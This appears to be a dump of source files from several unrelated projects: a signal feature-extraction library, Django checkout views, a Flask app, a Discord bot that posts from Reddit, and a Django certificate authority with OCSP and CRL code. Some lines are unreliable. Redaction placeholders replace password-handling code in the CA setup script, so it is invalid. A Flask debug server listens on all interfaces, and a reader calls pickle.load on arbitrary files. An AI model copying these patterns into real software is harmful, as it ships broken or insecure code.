self.wavelet_lvl = wavelet_lvl
self.axis = axis
self.result = list()
rows = s.shape[0]
if slide:
rows = range(0 , rows - timesteps)
else:
rows = range(0 , rows - timesteps, timesteps)
self.timesteps = timesteps
self.input_cols = input_cols
self.__get_energies(rows)
result = np.array(self.result)
return result
@ProgressBar(desc="Getting wavelet energies...", unit=" Sliding windows")
def __get_energies(self, row):
r"""
Documentation here
"""
if isinstance(self._s_, pd.DataFrame):
data = self._s_.loc[row: row + self.timesteps, self.input_cols].values
else:
data = self._s_[row,:,:]
energies = self.wave_energy(
data,
self.wavelet_type,
level=self.wavelet_lvl,
axis=self.axis
)
energies = np.concatenate(list(energies))
self.result.append(list(energies))
return
class FrequencyFeatures:
r"""
Documentation here
"""
_instances = list()
def __init__(self):
r"""
Documentation here
"""
self.wavelet = Wavelet()
def stft(self, s):
r"""
In construction...
The Short Time Fourier Transform (SFTF for short) of a given frame $s\left(m,n\right)$
is a Fourier transform performed in successive frames:
$S\left(m,n\right)=\sum_{n}s\left(m,n\right)\cdot{e^{\frac{-j2\pi nk}{N}}}$
where $s\left(m,n\right)=s\left(n\right)w\left(n-mL\right)$ and $w\left(n\right)$ is a windowing
function of $N$ samples
**Parameters**
* **s:**
**Returns**
* **stft:**
"""
pass
class RackioAIFE:
r"""
Rack Input/Output Artificial Intelligence Feature Extraction (RackioAIFE for short) is a class
to allows to you make feature extraction for pattern recognition models.
The feature extraction transforms originally high-dimensional patterns into lower dimensional vectors
by capturing the essential of their characteristics. Various feature extraction techniques have been
proposed in the literature for different signal applications. In speech and speaker recognition,
fault diagnosis, they are essentially based on Fourier transform, cepstral analysis, autoregressive
modeling, wavelet transform and statistical analysis.
"""
stats = StatisticalsFeatures()
freq = FrequencyFeatures()
if __name__=='__main__':
import doctest
doctest.testmod()
```
#### File: rackio_AI/preprocessing/kalman_filter.py
```python
class KalmanFilter:
"""
Class to filter data using kalman filter
**Attributes**
* **alpha:** (float) (default=1.0)
* **beta:** (float) (default=0.0): Uncertainty in measurement
* **f_value:** (float)
"""
def __init__(self):
"""
"""
self.alpha = 1.0
self.beta = 0.0
self.filtered_value = 0.0
self.posteri_error_estimate = 0.0
def set_init_value(self, value):
"""
Set init value for the Kalman filter
___
**Parameters**
* **:param value:** (float)
* **:return:**
None
___
## Snippet code
```python
>>> import numpy as np
>>> from rackio_AI import RackioAI
>>> preprocessing = RackioAI.get('Preprocessing', _type="Preprocessing")
>>> kf = preprocessing.kalman_filter # Kalman filter definition
>>> variable_to_filter = np.ones((10,1)) + np.random.random((10,1))
>>> kf.set_init_value(variable_to_filter[0])
```
"""
self.filtered_value = value
def __call__(self, value):
"""
**Parameters**
* **:param value:** (float) value to filter
:return:
See [This example](https://github.com/crivero7/RackioAI/blob/main/examples/example9.py) for a real example
```python
>>> import numpy as np
>>> from rackio_AI import RackioAI
>>> preprocessing = RackioAI.get("Preprocessing", _type="Preprocessing")
>>> kf = preprocessing.kalman_filter # Kalman filter definition
>>> kf.alpha = 0.001
>>> kf.beta = 0.2
>>> variable_to_filter = np.ones((10,1)) + np.random.random((10,1))
>>> filtered_variable = np.array([kf(value) for value in variable_to_filter]) # Applying Kalman filter
```
"""
# Prediction
f_value = self.filtered_value
priori_error_estimate = self.posteri_error_estimate + self.alpha
# Correction
blending_factor = priori_error_estimate / (priori_error_estimate + self.beta)
self.filtered_value = f_value + blending_factor * (value - f_value)
self.posteri_error_estimate = (1 - blending_factor) * priori_error_estimate
return self.filtered_value
```
#### File: readers/pkl/pkl_core.py
```python
import pandas as pd
from easy_deco.progress_bar import ProgressBar
from easy_deco.del_temp_attr import set_to_methods, del_temp_attr
import pickle
from random import shuffle
@set_to_methods(del_temp_attr)
class PKL:
"""
This format allows to you read faster a DataFrame saved in pkl format
"""
_instances = list()
def __init__(self):
super(PKL, self).__init__()
def read(self, pathname: str, **kwargs):
"""
Read a DataFrame saved with RackioAI's save method as a pkl file
**Parameters**
* **:param pathname:** (str) Filename or directory
```python
>>> import os
>>> from rackio_AI import RackioAI, get_directory
>>> filename = os.path.join(get_directory('Leak'), 'Leak01.tpl')
>>> df = RackioAI.load(filename)
>>> print(df.head())
tag TIME_SERIES PT_SECTION_BRANCH_TUBERIA_PIPE_Pipe60_NR_1 ... CONTR_CONTROLLER_CONTROL_FUGA file
variable Pressure ... Controller_output filename
unit S PA ... .tpl
0 0.000000 568097.3 ... 0.0 Leak01
1 0.502732 568098.2 ... 0.0 Leak01
2 1.232772 568783.2 ... 0.0 Leak01
3 1.653696 569367.3 ... 0.0 Leak01
4 2.200430 569933.5 ... 0.0 Leak01
<BLANKLINE>
[5 rows x 12 columns]
```
"""
self._df_ = list()
self.__read(pathname, **kwargs)
if 'shuffle' in kwargs:
_shuffle = kwargs['shuffle']
if _shuffle:
shuffle(self._df_)
df = pd.concat(self._df_)
return df
@ProgressBar(desc="Reading .pkl files...", unit="file")
def __read(self, pathname, **pkl_options):
"""
Read (pkl) file into DataFrame.
"""
with open(pathname, 'rb') as f:
_df = pickle.load(f)
if 'remove_initial_points' in pkl_options:
_rip = pkl_options['remove_initial_points']
_df.drop(index=_df.iloc[0:_rip, :].index.tolist(), inplace=True)
self._df_.append(_df)
return
if __name__ == "__main__":
# import doctest
# doctest.testmod()
import os
from rackio_AI import RackioAI, get_directory
filename = os.path.join(get_directory('Leak'), 'Leak01.tpl')
df = RackioAI.load(filename)
```
#### File: RackioAI/rackio_AI/_temporal.py
```python
from easy_deco.del_temp_attr import del_temp_attr, set_to_methods
@set_to_methods(del_temp_attr)
class TemporalMeta:
"""
The Singleton class can be implemented in different ways in Python. Some
possible methods include: base class, decorator, metaclass. We will use the
metaclass because it is best suited for this purpose.
"""
_instances = list()
def __new__(cls):
inst = super(TemporalMeta, cls).__new__(cls)
cls._instances.append(inst)
return inst
```
|
{
"source": "JesusDelgadoPatlan/tiendaSpark",
"score": 2
}
|
#### File: checkout/views/__init__.py
```python
from django.shortcuts import redirect
from django.template.response import TemplateResponse
from .discount import add_voucher_form, validate_voucher
from .shipping import (anonymous_user_shipping_address_view,
user_shipping_address_view)
from .summary import (
summary_with_shipping_view, anonymous_summary_without_shipping,
summary_without_shipping)
from .validators import (
validate_cart, validate_shipping_address,
validate_shipping_method, validate_is_shipping_required)
from ..core import load_checkout
from ..forms import ShippingMethodForm
from ...registration.forms import LoginForm
@load_checkout
@validate_cart
@validate_is_shipping_required
def index_view(request, checkout):
"""Redirect to the initial step of checkout."""
return redirect('checkout:shipping-address')
@load_checkout
@validate_voucher
@validate_cart
@validate_is_shipping_required
@add_voucher_form
def shipping_address_view(request, checkout):
"""Display the correct shipping address step."""
if request.user.is_authenticated:
return user_shipping_address_view(request, checkout)
return anonymous_user_shipping_address_view(request, checkout)
@load_checkout
@validate_voucher
@validate_cart
@validate_is_shipping_required
@validate_shipping_address
@add_voucher_form
def shipping_method_view(request, checkout):
"""Display the shipping method selection step."""
country_code = checkout.shipping_address.country.code
shipping_method_form = ShippingMethodForm(
country_code, request.POST or None,
initial={'method': checkout.shipping_method})
if shipping_method_form.is_valid():
checkout.shipping_method = shipping_method_form.cleaned_data['method']
return redirect('checkout:summary')
return TemplateResponse(
request, 'checkout/shipping_method.html',
context={
'shipping_method_form': shipping_method_form,
'checkout': checkout})
@load_checkout
@validate_voucher
@validate_cart
@add_voucher_form
def summary_view(request, checkout):
"""Display the correct order summary."""
if checkout.is_shipping_required:
view = validate_shipping_address(summary_with_shipping_view)
view = validate_shipping_method(view)
return view(request, checkout)
if request.user.is_authenticated:
return summary_without_shipping(request, checkout)
return anonymous_summary_without_shipping(request, checkout)
@load_checkout
@validate_cart
def login(request, checkout):
"""Allow the user to log in prior to checkout."""
if request.user.is_authenticated:
return redirect('checkout:index')
form = LoginForm()
return TemplateResponse(request, 'checkout/login.html', {'form': form})
```
|
{
"source": "jesusej/CarSimulator3D",
"score": 2
}
|
#### File: jesusej/CarSimulator3D/server.py
```python
from flask import Flask, render_template, request, jsonify
import json, logging, os, atexit
from micromodelo import createJson
app = Flask(__name__, static_url_path='')
# On IBM Cloud Cloud Foundry, get the port number from the environment variable PORT
# When running this app on the local machine, default the port to 8000
port = int(os.getenv('PORT', 8000))
@app.route('/')
def root():
return jsonify(createJson())
if __name__ == '__main__':
app.run(host='0.0.0.0', port=port, debug=True)
```
|
{
"source": "Jesus-E-Rodriguez/DiscordRedditPoster",
"score": 3
}
|
#### File: DiscordRedditPoster/client/mixins.py
```python
import json
from typing import Any, Dict, List, Union, Generator, Optional, Callable
import asyncpraw
import asyncprawcore
from asyncpraw.models import ListingGenerator
from client.models import RedditHelper
class Storage:
"""Mixin for storing data."""
def __init__(self, filename: str = "data.json") -> None:
"""Initialize the mixin."""
self.filename = filename
def get(
self,
default: Optional[Dict[str, Any]] = None,
callback: Optional[Callable] = None,
) -> dict:
"""Retrieves data from the given filename as a serialized json object.
Or creates a file with the default if it doesn't exist.
"""
data = default or {}
try:
with open(self.filename, "r") as file:
data = json.load(file)
except (json.decoder.JSONDecodeError, FileNotFoundError):
self.set(data)
if callback:
callback()
return data
def set(self, data: Dict[str, Any], callback: Optional[Callable] = None) -> None:
"""Saves the given data to the given filename in json format."""
with open(self.filename, "w") as file:
json.dump(data, file)
if callback:
callback()
class Reddit:
"""Base mixin for reddit functionality."""
def __init__(
self,
client_id: str,
client_secret: str,
filename: str = "data.json",
callback: Optional[Callable] = None,
) -> None:
"""Initialize the mixin."""
self.storage = Storage(filename=filename)
self.subreddits = self.storage.get(
default={"subscribed": [], "banned": []}, callback=callback
)
self.request = asyncpraw.Reddit(
client_id=client_id,
client_secret=client_secret,
user_agent=f"DISCORD_BOT:{client_id}:1.0",
)
async def subreddit_exists(self, subreddit: str) -> bool:
"""Check if a subreddit exists."""
subreddit_exists = False
try:
_ = [
sub
async for sub in self.request.subreddits.search_by_name(
query=subreddit, exact=True
)
]
subreddit_exists = True
except (asyncprawcore.NotFound, asyncprawcore.exceptions.Redirect):
pass
return subreddit_exists
async def fetch(
self,
subreddit_or_redditor: str,
search_type: Optional[str] = "subreddit",
search_term: Optional[str] = None,
fetch: Optional[bool] = True,
sort: Optional[str] = None,
limit: Optional[int] = 1,
*args,
**kwargs,
) -> Union[ListingGenerator, List]:
"""Fetch posts from a subreddit or a redditor."""
if not await self.subreddit_exists(subreddit=subreddit_or_redditor):
search_type = "redditor"
if not search_term:
sort = "new"
results = []
try:
helper = RedditHelper(reddit=self.request, method=search_type)
results = await helper.filter(
query=subreddit_or_redditor,
search_term=search_term,
fetch=fetch,
sort=sort,
limit=limit,
*args,
**kwargs,
)
except asyncprawcore.exceptions.Redirect:
pass
return results
def manage_subscription(
self,
channel_id: int,
subreddit: str,
subscribe: bool = True,
callback: Optional[Callable] = None,
) -> None:
"""Store the channel id and subreddit to subscribe to. Subscribes by default."""
subscription = {"channel_id": channel_id, "subreddit": subreddit}
if subscribe:
self.subreddits.setdefault("subscribed", []).append(subscription)
else:
try:
self.subreddits.get("subscribed", []).remove(subscription)
except ValueError:
pass
self.storage.set(self.subreddits, callback=callback)
def manage_moderation(
self,
subreddit: str,
ban: bool = True,
callback: Optional[Callable] = None,
) -> None:
"""Manages bans. Bans by default."""
if ban:
[
self.manage_subscription(**sub, subscribe=False)
for sub in self.subreddits.get("subscribed", [])
if sub.get("subreddit") == subreddit
]
self.subreddits.setdefault("banned", []).append(subreddit)
else:
try:
self.subreddits.get("banned", []).remove(subreddit)
except ValueError:
pass
self.storage.set(self.subreddits, callback=callback)
def subreddit_is_banned(self, subreddit: str) -> bool:
"""Checks if the given subreddit is banned."""
return subreddit in self.subreddits.get("banned", [])
def subreddit_is_subscribed(self, channel_id: str, subreddit: str) -> bool:
"""Checks if the given subreddit is subscribed."""
return any(
channel_id == sub.get("channel_id") and subreddit == sub.get("subreddit")
for sub in self.subreddits.get("subscribed", [])
)
def get_subscriptions(self) -> Generator:
"""Returns a generator with subscribed subreddits."""
return (sub.values() for sub in self.subreddits.get("subscribed", []))
```
#### File: Jesus-E-Rodriguez/DiscordRedditPoster/config.py
```python
import logging
import os
from logging.config import dictConfig
from dotenv import load_dotenv
from env import EnvMixin
load_dotenv()
ENVIRONMENT = os.environ.get("ENVIRONMENT", "development")
BASE_DIR = os.path.dirname(os.path.realpath(__file__))
LOGFILENAME = os.getenv("LOGFILENAME", default="discord_bot")
dictConfig(
{
"version": 1,
"formatters": {
"default": {
"format": "[%(asctime)s] %(levelname)s in %(module)s: %(message)s",
}
},
"handlers": {
f"{LOGFILENAME}": {
"class": "logging.FileHandler",
"filename": os.path.join(BASE_DIR, f"logs/{LOGFILENAME}.log"),
"encoding": "utf-8",
"mode": "a",
"formatter": "default",
}
},
"root": {
"level": os.getenv("LOGLEVEL", default=logging.DEBUG),
"handlers": [f"{LOGFILENAME}"],
},
}
)
class BaseConfig(EnvMixin):
"""Base configuration"""
ENVIRONMENT: str = ENVIRONMENT
DEBUG: bool = False
TESTING: bool = False
DISCORD_BOT_TOKEN: str
REDDIT_CLIENT_ID: str
REDDIT_CLIENT_SECRET: str
DISCORD_BOT_ADVANCED_COMMANDS_ROLES: list
DISCORD_BOT_NORMAL_COMMANDS_ROLES: list
BASE_DIR: str = BASE_DIR
FILENAME: str = os.path.join(BASE_DIR, "data/subreddits.json")
LOGFILENAME: str = LOGFILENAME
class DevelopmentConfig(BaseConfig):
"""Development configuration."""
DEBUG: bool = True
TESTING: bool = True
class ProductionConfig(BaseConfig):
"""Production configuration."""
def get_config(env: str) -> BaseConfig:
"""Get configuration based on environment."""
if env.lower() == "development":
return DevelopmentConfig()
elif env.lower() == "production":
return ProductionConfig()
else:
raise ValueError(f"Invalid environment: {env}")
```
|
{
"source": "jesusfer/webca",
"score": 2
}
|
#### File: webca/setup/setup.py
```python
import getpass
import io
import json
import os
import re
import sys
BASE_DIR = os.path.abspath(os.path.join(
os.path.dirname(os.path.abspath(__file__)), os.path.pardir))
sys.path.append(BASE_DIR)
os.environ["DJANGO_SETTINGS_MODULE"] = "webca.ca_admin.settings"
from webca.certstore import CertStore
from webca.config import constants as p
from webca.config import new_crl_config
from webca.crypto import certs
from webca.crypto import constants as c
from webca.crypto.utils import int_to_hex, new_serial
from webca.crypto.extensions import json_to_extension
from webca.utils import dict_as_tuples
from webca.utils.iso_3166 import ISO_3166_1_ALPHA2_COUNTRY_CODES as iso3166
MSG_DB = """\nA database is needed to store templates, user requests and issued certificates."""
MSG_DB_CERTS = """\nAnother database is needed to store the CA certificates.
It should a different than the web database."""
def setup():
"""Orchestrate the setup process."""
print('\n*** Setup of database servers ***')
config = {}
config.update(get_database(MSG_DB, 'web_'))
config.update(get_database(MSG_DB_CERTS, 'certs_'))
hosts = get_host_names()
print("""\nReview the options above, they are needed to continue.\n""")
option = input('Continue? (Y/n)').lower()
if option == 'n':
sys.exit(-1)
create_settings(config, hosts)
init_django()
print('\n*** Setup of CA certificates ***')
setup_certificates()
setup_crl_publishing()
setup_user_groups()
setup_super_user()
install_templates()
collect_static()
review_secret_key()
setup_email()
"""
FUTURE: Just in case we wanted to filter the options
with the installed modules:
django.db.backends.sqlite3
django.db.backends.postgresql: psycopg2
django.db.backends.mysql: mysqlclient
django.db.backends.oracle: cx_Oracle
"""
def get_database(reason, prefix):
"""Get database settings."""
print(reason)
print("""
Choose an engine:
1. SQLite3
2. PostgreSQL
3. MySQL
4. Oracle
""")
engine = input('Engine: ')
server = input('DB Server: ')
name = input('DB Name: ')
user = input('User: ')
password = <PASSWORD>()
print('To use the default port, leave blank.')
port = input('Port: ')
config = {
prefix+'engine': _get_engine(engine),
prefix+'server': server,
prefix+'name': name,
prefix+'user': user,
prefix+'password': password,
prefix+'port': port,
}
return config
def _get_engine(number):
if not isinstance(number, int):
number = int(number)
if number == 1:
return 'django.db.backends.sqlite3'
elif number == 2:
return 'django.db.backends.postgresql'
elif number == 3:
return 'django.db.backends.mysql'
elif number == 4:
return 'django.db.backends.oracle'
DB_DEFAULT = """DATABASES = {
'default': {
'ENGINE': '%(engine)s',
'NAME': '%(name)s',
'USER': '%(user)s',
'PASSWORD': <PASSWORD>',
'HOST': '%(server)s',
'PORT': '%(port)s',
}
}
"""
DB_CERTS = """DATABASES = {}
DATABASES['certstore_db'] = {
'ENGINE': '%(engine)s',
'NAME': '%(name)s',
'USER': '%(user)s',
'PASSWORD': <PASSWORD>',
'HOST': '%(server)s',
'PORT': '%(port)s',
}
"""
ALLOWED_HOSTS = """
ALLOWED_HOSTS = {}
"""
OCSP_URL = """
# OCSP
OCSP_URL = 'http://{}/'
"""
def get_host_names():
"""Get the required host names for ALLOWED_HOSTS"""
print("""
As a security measure, the web applications need to know the host names that will be used by the users to access them.
We need to configure the host for the public web and another for the admin web.
The OCSP reponder also needs a hostname. Requests will go to http://<ocsp_host>/
""")
web_host = input('Public web host: ').lower()
admin_host = input('Admin web host: ').lower()
ocsp_host = input('OCSP host: ').lower()
option = input('\nAre these correct? (Y/n)').lower()
if option == 'n':
return get_host_names()
return {'web': web_host, 'admin': admin_host, 'ocsp': ocsp_host}
def create_settings(config, hosts):
"""Write settings files."""
web_path = os.path.join(BASE_DIR, 'webca', 'settings_local.py')
admin_path = os.path.join(
BASE_DIR, 'webca', 'ca_admin', 'settings_local.py')
service_path = os.path.join(
BASE_DIR, 'webca', 'ca_service', 'settings_local.py')
ocsp_path = os.path.join(BASE_DIR, 'webca', 'ca_ocsp', 'settings_local.py')
_create_db_settings(config, 'web_', DB_DEFAULT, web_path)
_create_db_settings(config, 'certs_', DB_CERTS, admin_path)
_create_db_settings(config, 'certs_', DB_CERTS, service_path)
_create_db_settings(config, 'certs_', DB_CERTS, ocsp_path)
_generic_settings(web_path, ALLOWED_HOSTS.format([hosts['web']]))
_generic_settings(admin_path, ALLOWED_HOSTS.format([hosts['admin']]))
_generic_settings(admin_path, OCSP_URL.format(hosts['ocsp']))
_generic_settings(service_path, OCSP_URL.format(hosts['ocsp']))
_generic_settings(ocsp_path, ALLOWED_HOSTS.format([hosts['ocsp']]))
def _create_db_settings(config, prefix, template, path):
print('Writing ' + path)
settings_local = open(path, 'w', encoding='utf-8')
settings_local.writelines(template % {
'engine': config[prefix+'engine'],
'server': config[prefix+'server'],
'name': config[prefix+'name'],
'user': config[prefix+'user'],
'password': config[prefix+'password'],
'port': config[prefix+'port'],
})
settings_local.close()
def _generic_settings(path, value):
settings_local = open(path, 'a+', encoding='utf-8')
settings_local.writelines(value)
settings_local.close()
def init_django():
"""Initialize Django."""
print('\nInitializing Django...')
import django
try:
django.setup()
except Exception as ex:
import traceback
traceback.print_exc()
print('There was an error initializing up Django: {}'.format(ex))
print('Exiting...')
exit()
# Django is available, migrate first
from django.core.management import call_command
from django.core.exceptions import ImproperlyConfigured
try:
call_command('migrate', interactive=False)
except ImproperlyConfigured as ex:
print('Error setting up databases: {}'.format(ex))
try:
call_command('migrate', 'certstore_db',
database='certstore_db',
settings='webca.ca_admin.settings',
interactive=False)
except ImproperlyConfigured as ex:
print('Error setting up databases: {}'.format(ex))
def setup_certificates():
"""Setup the CA certificates."""
print('\nA CA certificate needs to be imported or created.')
# List available certificate stores
stores = CertStore.all()
print('These are the available certificate stores.')
if len(stores) == 1:
name, cls = stores[0]
print('The only store available is: %s' % name)
store = cls()
else:
option = 0
i = 1
while option < 1 or option > len(stores):
for name, cls in stores:
print('{}. {}'.format(i, name))
option = input('Choose a certificate store: ')
try:
option = int(option)
except:
option = 0
store = stores[option - 1][1]()
ca_key, ca_cert = _setup_certificates_ca(store)
_setup_certificates_csr(store)
# FUTURE: this doesn't make sense anymore. we are not using client cert auth now
_setup_certificates_user(store, ca_key, ca_cert)
_setup_certificates_ocsp(store, ca_key, ca_cert)
def _setup_certificates_csr(store):
"""Create CSR signing keypair/certificate"""
from webca.config.models import ConfigurationObject as Config
name = [
('CN', 'Internal CSR Signing'),
('O', 'WebCA'),
]
dur = (1 << 31) - 1
csr_keys, csr_cert = certs.create_self_signed(name, duration=dur)
store.add_certificate(csr_keys, csr_cert)
Config.set_value(p.CERT_CSRSIGN, '{},{}'.format(
store.STORE_ID, int_to_hex(csr_cert.get_serial_number())
))
def _setup_certificates_ca(store):
"""Set up the CA certificate."""
from webca.config.models import ConfigurationObject as Config
print('\nThe CA needs a certificate. '
'You must import one or create a self-signed one now.')
option = 0
while option not in [1, 2]:
print('\n1. Import a PFX')
print('2. Generate a self-signed Root CA using RSA')
option = input('Choose an option: ')
try:
option = int(option)
except ValueError:
pass
ca_key = ca_cert = ca_serial = None
if option == 1:
# Import a PFX
filename = input('Filename: ')
from django.core.management import call_command, CommandError
try:
out = io.StringIO()
call_command('importpfx', filename,
store.__class__.__name__, stdout=out)
ca_serial = re.search(r'serial=(\w+)', out.getvalue()).groups()[0]
ca_cert = store.get_certificate(ca_serial)
ca_key = store.get_private_key(ca_serial)
except CommandError as ex:
print('Error importing PFX: %s' % ex)
sys.exit()
else:
# Generate a self-signed CA
bits = -1
while bits < 2048:
try:
bits = input('Key size (min 2048 bits): ')
if not bits:
bits = 2048
else:
bits = int(bits)
except ValueError:
pass
c = -1
while c == -1:
c = input('Country (2-letters): ').upper()
if c and c not in iso3166:
c = -1
st = input('State: ')
l = input('Locality: ')
o = input('Organization: ')
ou = input('Organizational Unit: ')
cn = input('Common name: ')
print('\nThis is the name of the certificate:')
print("""
Country: %s
State: %s
Locality: %s
Organization: %s
Organizational Unit: %s
Common Name: %s""" % (c, st, l, o, ou, cn))
option = input('Is this OK? (Y/n)').lower()
if option == 'n':
return _setup_certificates_ca(store)
else:
name = {}
if c:
name['C'] = c
if st:
name['ST'] = st
if l:
name['L'] = l
if o:
name['O'] = o
if ou:
name['OU'] = ou
if cn:
name['CN'] = cn
name = dict_as_tuples(name)
ca_key, ca_cert = certs.create_ca_certificate(name, bits)
store.add_certificate(ca_key, ca_cert)
ca_serial = int_to_hex(ca_cert.get_serial_number())
Config.set_value(p.CERT_KEYSIGN, '{},{}'.format(
store.STORE_ID, ca_serial
))
Config.set_value(p.CERT_CRLSIGN, '{},{}'.format(
store.STORE_ID, ca_serial
))
return ca_key, ca_cert
def _setup_certificates_user(store, ca_key, ca_cert):
"""Create user authentication certificate."""
from webca.config.models import ConfigurationObject as Config
name = [
('CN', 'User Authencation'),
('O', 'WebCA'),
]
user_key, user_cert = certs.create_ca_certificate(
name, 2048, pathlen=0, duration=10*365*24*3600,
signing_cert=(ca_cert, ca_key))
store.add_certificate(user_key, user_cert)
Config.set_value(p.CERT_USERSIGN, '{},{}'.format(
store.STORE_ID, int_to_hex(user_cert.get_serial_number())
))
def _setup_certificates_ocsp(store, ca_key, ca_cert):
"""Create OCSP signing certificate."""
from webca.config.models import ConfigurationObject as Config
name = [
('CN', 'OCSP Signing'),
('O', 'WebCA'),
]
ocsp_key = certs.create_key_pair(c.KEY_RSA, 2048)
extensions = [
json_to_extension(
'{"name":"keyUsage","critical":true,"value":"digitalSignature"}'),
json_to_extension(
'{"name":"extendedKeyUsage","critical":false,"value":"OCSPSigning"}'),
]
ocsp_csr = certs.create_cert_request(ocsp_key, name, extensions)
ocsp_cert = certs.create_certificate(
ocsp_csr, (ca_cert, ca_key), new_serial(), (0, 10*365*24*3600))
store.add_certificate(ocsp_key, ocsp_cert)
Config.set_value(p.CERT_OCSPSIGN, '{},{}'.format(
store.STORE_ID, int_to_hex(ocsp_cert.get_serial_number())
))
def setup_crl_publishing():
"""Do some minimal CRL configuration.
We just need to create the default configuration.
The CRLs will be published every 15 days and the location will be the STATIC folder.
"""
from django.conf import settings
from webca.config.models import ConfigurationObject as Config
from webca.web.models import CRLLocation
print("\n\nCRL publishing setup.\n\nA URL where the CRL will be published is needed.")
crl_url = input("CRL location: ")
# TODO: Validate the URL
crl = CRLLocation(url=crl_url)
crl.save()
config = new_crl_config()
config['path'] = os.path.join(settings.STATIC_ROOT, 'ca.crl')
Config.set_value(p.CRL_CONFIG, json.dumps(config))
print("Default CRL publishing freq: 15 days")
print("Default CRL publishing path: %s" % config['path'])
def install_templates():
"""Create default templates."""
print('\nDo you want some certificate templates to be automatically created?')
option = input('Continue? (Y/n): ').lower()
if option == 'n':
return
from django.core import serializers
data = open(os.path.join(BASE_DIR, 'setup/templates.json'))
templates = serializers.deserialize('json', data)
for template in templates:
template.save()
print('Created: %s' % template.object.name)
def setup_user_groups():
"""Create the default groups"""
from django.contrib.auth.models import Group
group = Group(name="All Users")
group.save()
group = Group(name="Operators")
group.save()
def setup_super_user():
from django.core.management import call_command
from django.core.exceptions import ImproperlyConfigured
print("A super user/administrator needs to be created.")
try:
call_command("createsuperuser", interactive=True)
except ImproperlyConfigured as ex:
print('Error creating the super user: {}'.format(ex))
def setup_email():
"""Display Email configuration warning."""
from django.conf import settings
print("\nAn email server must be setup so that users can authenticate.")
print("Review the EMAIL settings in the settings file and update them: {}".format(
os.path.join(settings.BASE_DIR, 'webca', 'settings.py')
))
def collect_static():
"""Run collectstatic"""
from django.conf import settings
from django.core.management import call_command
from django.core.exceptions import ImproperlyConfigured
print("\nNow the static files of the web applications will be copied to a folder.")
try:
call_command("collectstatic", interactive=False)
except ImproperlyConfigured as ex:
print('Error collecting static files: {}'.format(ex))
print('\nYou need to make your web server serve the files in the folder "{}" in the '
'following URL of your web applications: {}'.format(settings.STATIC_ROOT, settings.STATIC_URL))
def review_secret_key():
"""Display SECRET_KEY warning."""
from django.conf import settings
print("""
***********************************************
Django uses a secret key for internal purposes.
You *MUST* change the value of the variable SECRET_KEY in the following locations:
{}
{}
{}
{}
""".format(
os.path.join(settings.BASE_DIR, 'webca', 'settings.py'),
os.path.join(settings.BASE_DIR, 'webca', 'ca_admin', 'settings.py'),
os.path.join(settings.BASE_DIR, 'webca', 'ca_ocsp', 'settings.py'),
os.path.join(settings.BASE_DIR, 'webca', 'ca_service', 'settings.py'),
))
if __name__ == '__main__':
try:
setup()
except KeyboardInterrupt:
print('\n\n**** Setup is NOT complete ****', file=sys.stderr)
print('**** Please run this script again ****\n', file=sys.stderr)
sys.exit(-1)
```
#### File: webca/ca_ocsp/tests.py
```python
from base64 import b64encode
from urllib.parse import quote
from asn1crypto.ocsp import OCSPRequest, OCSPResponse, TBSRequest
from django.test import TestCase
def build_request_good():
tbs_request = TBSRequest({
'request_list': [
{
'req_cert': {
'hash_algorithm': {
'algorithm': 'sha1'
},
'issuer_name_hash': b'379276ADE1846D5A1D184BC135A2D3D23B221DA2',
'issuer_key_hash': b'C7BA089932AE7ABE29D136723E5FF49F480F68F3',
'serial_number': 221578034377984887419532563643305653706,
},
'single_request_extensions': []
}
],
'request_extensions': []
})
ocsp = OCSPRequest({
'tbs_request': tbs_request,
'optional_signature': None
})
return ocsp
def build_request_revoked():
tbs_request = TBSRequest({
'request_list': [
{
'req_cert': {
'hash_algorithm': {
'algorithm': 'sha1'
},
'issuer_name_hash': b'379276ADE1846D5A1D184BC135A2D3D23B221DA2',
'issuer_key_hash': b'C7BA089932AE7ABE29D136723E5FF49F480F68F3',
'serial_number': 43335495160811514204812512316928417740,
},
'single_request_extensions': []
}
],
'request_extensions': []
})
ocsp = OCSPRequest({
'tbs_request': tbs_request,
'optional_signature': None
})
return ocsp
class OCSP(TestCase):
"""Test the OCSP responder."""
fixtures = [
# 'initial',
'config',
'certstore_db',
]
multi_db = True
def test_get_empty(self):
"""Empty GET."""
response = self.client.get('/')
self.assertEqual(response.status_code, 200)
ocsp = OCSPResponse.load(response.content)
self.assertEqual(ocsp.native['response_status'], 'malformed_request')
def test_get_slug_invalid(self):
"""Invalid GET request."""
response = self.client.get('/something')
self.assertEqual(response.status_code, 200)
ocsp = OCSPResponse.load(response.content)
self.assertEqual(ocsp.native['response_status'], 'malformed_request')
def test_get(self):
"""Valid GET request."""
ocsp = build_request_good()
body = quote(b64encode(ocsp.dump()).decode('utf8'))
response = self.client.get('/' + body)
self.assertEqual(response.status_code, 200)
ocsp = OCSPResponse.load(response.content)
self.assertEqual(ocsp.native['response_status'], 'successful')
def test_post_revoked(self):
"""Valid POST request."""
ocsp = build_request_revoked()
response = self.client.post('/', data=ocsp.dump(), content_type='application/ocsp-request')
self.assertEqual(response.status_code, 200)
ocsp = OCSPResponse.load(response.content)
self.assertEqual(ocsp.native['response_status'], 'successful')
def test_post_good(self):
"""Valid POST request."""
ocsp = build_request_good()
response = self.client.post('/', data=ocsp.dump(), content_type='application/ocsp-request')
self.assertEqual(response.status_code, 200)
ocsp = OCSPResponse.load(response.content)
self.assertEqual(ocsp.native['response_status'], 'successful')
```
#### File: webca/crypto/crl.py
```python
from datetime import datetime, timedelta
from cryptography import x509
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from OpenSSL import crypto
from webca.crypto.extensions import get_certificate_extension
from webca.crypto.utils import datetime_to_asn1, int_to_hex
REASON_UNSPECIFIED = crypto.Revoked().all_reasons()[0]
# is_delta=False, delta_number=None, crl_locations=None
def create_crl(revoked_list, days, issuer, number):
"""Create a CRL using cryptography's API and then convert it to pyopenssl.
Arguments
----------
`revoked_list` - list of integers that represent the serial number of the revoked certificates
`days` - number of days for the next update
`issuer` - cert,key tuple of the certificate used to sign the CRL
`number` - CRL sequence number
"""
issuer_cert, issuer_key = issuer
# crl_locations = crl_locations or []
builder = x509.CertificateRevocationListBuilder()
name_attrs = []
if issuer_cert.get_subject().CN:
name_attrs.append(
x509.NameAttribute(
x509.oid.NameOID.COMMON_NAME,
issuer_cert.get_subject().CN
)
)
if issuer_cert.get_subject().C:
name_attrs.append(
x509.NameAttribute(
x509.oid.NameOID.COUNTRY_NAME,
issuer_cert.get_subject().C
)
)
if issuer_cert.get_subject().ST:
name_attrs.append(
x509.NameAttribute(
x509.oid.NameOID.STATE_OR_PROVINCE_NAME,
issuer_cert.get_subject().ST
)
)
